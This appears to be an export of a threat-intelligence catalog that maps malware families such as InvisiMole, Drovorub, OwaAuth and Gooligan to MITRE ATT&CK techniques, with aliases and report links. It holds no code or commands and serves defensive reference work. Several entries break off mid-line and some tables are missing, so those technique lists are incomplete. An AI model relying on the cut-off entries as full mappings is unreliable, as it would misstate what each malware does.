- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"


Table 4508. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0520">https://attack.mitre.org/software/S0520</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a</a></td>
</tr>
<tr>
<td><a href="https://digital.nhs.uk/cyber-alerts/2020/cc-3603">https://digital.nhs.uk/cyber-alerts/2020/cc-3603</a></td>
</tr>
</tbody>
</table>

OnionDuke - S0052

[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="OnionDuke - S0052"

OnionDuke - S0052 is also known as:

• OnionDuke

OnionDuke - S0052 has relationships with:

• similar: misp-galaxy:malpedia="OnionDuke" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4509. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0052">https://attack.mitre.org/software/S0052</a></td>
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</table>

2404
Drovorub - S0502

[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)

The tag is: *misp-galaxy:mitre-malware="Drovorub - S0502"*

Drovorub - S0502 is also known as:

- Drovorub

Drovorub - S0502 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

*Table 4510. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0502">https://attack.mitre.org/software/S0502</a></td>
</tr>
</tbody>
</table>
Naid - S0205

[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)

The tag is: `misp-galaxy:mitre-malware="Naid - S0205"`

Naid - S0205 is also known as:

- Naid

Naid - S0205 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"

Table 4511. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0205">https://attack.mitre.org/software/S0205</a></td>
</tr>
</tbody>
</table>

GLOOXMAIL - S0026

[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)
The tag is: `misp-galaxy:mitre-malware="GLOOXMAIL - S0026"`

GLOOXMAIL - S0026 is also known as:

- GLOOXMAIL
- Trojan.GTALK

GLOOXMAIL - S0026 has relationships with:

- similar: `misp-galaxy:tool="GLOOXMAIL"` with `estimative-language:likelihood-probability="likely"`

Table 4512. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0026">https://attack.mitre.org/software/S0026</a></td>
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<tr>
<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
</tr>
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</table>

**Circles - S0602**

[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group. (Citation: CitizenLab Circles)

The tag is: `misp-galaxy:mitre-malware="Circles - S0602"`

Circles - S0602 is also known as:

- Circles

Circles - S0602 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450"` with `estimative-language:likelihood-probability="almost-certain"`

Table 4513. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0602">https://attack.mitre.org/software/S0602</a></td>
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</table>
DustySky - S0062

[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)

The tag is: `misp-galaxy:mitre-malware="DustySky - S0062"`

DustySky - S0062 is also known as:

- DustySky
- NeD Worm

DustySky - S0062 has relationships with:

- similar: `misp-galaxy:tool="NeD Worm"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"` with estimative-
InvisiMole - S0260

[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims. (Citation: ESET InvisiMole June 2018) (Citation: ESET InvisiMole June 2020)

The tag is: `misp-galaxy:mitre-malware="InvisiMole - S0260"`

InvisiMole - S0260 is also known as:

- InvisiMole

InvisiMole - S0260 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 4515. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0260">https://attack.mitre.org/software/S0260</a></td>
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</table>

**Wiarp - S0206**

[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)

The tag is: `misp-galaxy:mitre-malware="Wiarp - S0206"`

Wiarp - S0206 is also known as:

• Wiarp

Wiarp - S0206 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4516. Table References

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<td><a href="https://attack.mitre.org/software/S0206">https://attack.mitre.org/software/S0206</a></td>
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</table>

OwaAuth - S0072

[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)

The tag is: `misp-galaxy:mitre-malware="OwaAuth - S0072"`

OwaAuth - S0072 is also known as:

- OwaAuth

OwaAuth - S0072 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

RogueRobin - S0270

[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#.

(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)

The tag is: *misp-galaxy:mitre-malware="RogueRobin - S0270"

RogueRobin - S0270 is also known as:

- RogueRobin

RogueRobin - S0270 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
Vasport - S0207

[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)

The tag is: `misp-galaxy:mitre-malware="Vasport - S0207"`

Vasport - S0207 is also known as:

- Vasport

Vasport - S0207 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4519. Table References

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<td><a href="https://attack.mitre.org/software/S0207">https://attack.mitre.org/software/S0207</a></td>
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</table>

**Zeroaccess - S0027**

[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)

The tag is: `misp-galaxy:mitre-malware="Zeroaccess - S0027"`

Zeroaccess - S0027 is also known as:

- Zeroaccess
- Trojan.Zeroaccess

Zeroaccess - S0027 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4520. Table References

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<th>Links</th>
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<td><a href="https://attack.mitre.org/software/S0027">https://attack.mitre.org/software/S0027</a></td>
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<tr>
<td><a href="https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf">https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf</a></td>
</tr>
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</table>

**SHIPSHAPE - S0028**

[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: `misp-galaxy:mitre-malware="SHIPSHAPE - S0028"`
SHIPSHAPE - S0028 is also known as:

- SHIPSHAPE

SHIPSHAPE - S0028 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 4521. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0028">https://attack.mitre.org/software/S0028</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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</table>

Emissary - S0082

[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)

The tag is: misp-galaxy:mitre-malware="Emissary - S0082"

Emissary - S0082 is also known as:

- Emissary

Emissary - S0082 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"


Table 4522. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0082">https://attack.mitre.org/software/S0082</a></td>
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<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/">http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/</a></td>
</tr>
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</table>

**MirageFox - S0280**

[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)

The tag is: *misp-galaxy:mitre-malware="MirageFox - S0280"*

MirageFox - S0280 is also known as:

- MirageFox

MirageFox - S0280 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with
estimative-language:likelihood-probability="almost-certain"


Table 4523. Table References

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<td><a href="https://attack.mitre.org/software/S0280">https://attack.mitre.org/software/S0280</a></td>
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**Pasam - S0208**

[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)

The tag is: **misp-galaxy:mitre-malware="Pasam - S0208"**

Pasam - S0208 is also known as:

- Pasam

Pasam - S0208 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 4524. Table References

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Darkmoon - S0209

is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)

Aliases: Darkmoon

The tag is: misp-galaxy:mitre-malware="Darkmoon - S0209"

Darkmoon - S0209 has relationships with:

• similar: misp-galaxy:malpedia="Darkmoon" with estimative-language:likelihood-probability="likely"
• revoked-by: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 4525. Table References

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<td><a href="https://attack.mitre.org/software/S0209">https://attack.mitre.org/software/S0209</a></td>
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Gooligan - S0290

[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)

The tag is: misp-galaxy:mitre-malware="Gooligan - S0290"

Gooligan - S0290 is also known as:

• Gooligan
• Ghost Push

Gooligan - S0290 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-
MazarBOT - S0303

[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)

The tag is: `misp-galaxy:mitre-malware="MazarBOT - S0303"`

MazarBOT - S0303 is also known as:

- MazarBOT

MazarBOT - S0303 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"` with estimative-language:likelihood-probability="almost-certain"

---

NetTraveler - S0033

[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)

The tag is: `misp-galaxy:mitre-malware="NetTraveler - S0033"`
NetTraveler - S0033 is also known as:

- NetTraveler

NetTraveler - S0033 has relationships with:

- similar: misp-galaxy:tool="NetTraveler" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4528. Table References

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<td><a href="https://attack.mitre.org/software/S0033">https://attack.mitre.org/software/S0033</a></td>
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**BUBBLEWRAP - S0043**

[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)

The tag is: *misp-galaxy:mitre-malware="BUBBLEWRAP - S0043"*

BUBBLEWRAP - S0043 is also known as:

- BUBBLEWRAP
- Backdoor.APT.FakeWinHTTPHelper

BUBBLEWRAP - S0043 has relationships with:


Table 4529. Table References

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<td><a href="https://attack.mitre.org/software/S0043">https://attack.mitre.org/software/S0043</a></td>
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NETEAGLE - S0034

[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)

The tag is: `misp-galaxy:mitre-malware="NETEAGLE - S0034"`

NETEAGLE - S0034 is also known as:

- NETEAGLE

NETEAGLE - S0034 has relationships with:

- similar: `misp-galaxy:malpedia="NETEAGLE"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568"` with estimative-language:likelihood-probability="almost-certain"

Table 4530. Table References
Octopus - S0340

[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan. (Citation: Securelist Octopus Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Octopus - S0340"`

Octopus - S0340 is also known as:

- Octopus

Octopus - S0340 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

Table 4531. Table References

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<td><a href="https://attack.mitre.org/software/S0340">https://attack.mitre.org/software/S0340</a></td>
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Riltok - S0403

[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials. (Citation: Kaspersky Riltok June 2019)

The tag is: `misp-galaxy:mitre-malware="Riltok - S0403"`

Riltok - S0403 is also known as:

- Riltok

Riltok - S0403 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Input Injection - T1516"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with estimative-language:likelihood-probability="almost-certain"

Table 4532. Table References

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<td><a href="https://attack.mitre.org/software/S0403">https://attack.mitre.org/software/S0403</a></td>
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<td><a href="https://securelist.com/mobile-banker-riltok/91374/">https://securelist.com/mobile-banker-riltok/91374/</a></td>
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</table>

SPACESHIP - S0035

[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)
The tag is: `misp-galaxy:mitre-malware="SPACESHIP - S0035"`

SPACESHIP - S0035 is also known as:

- SPACESHIP

SPACESHIP - S0035 has relationships with:

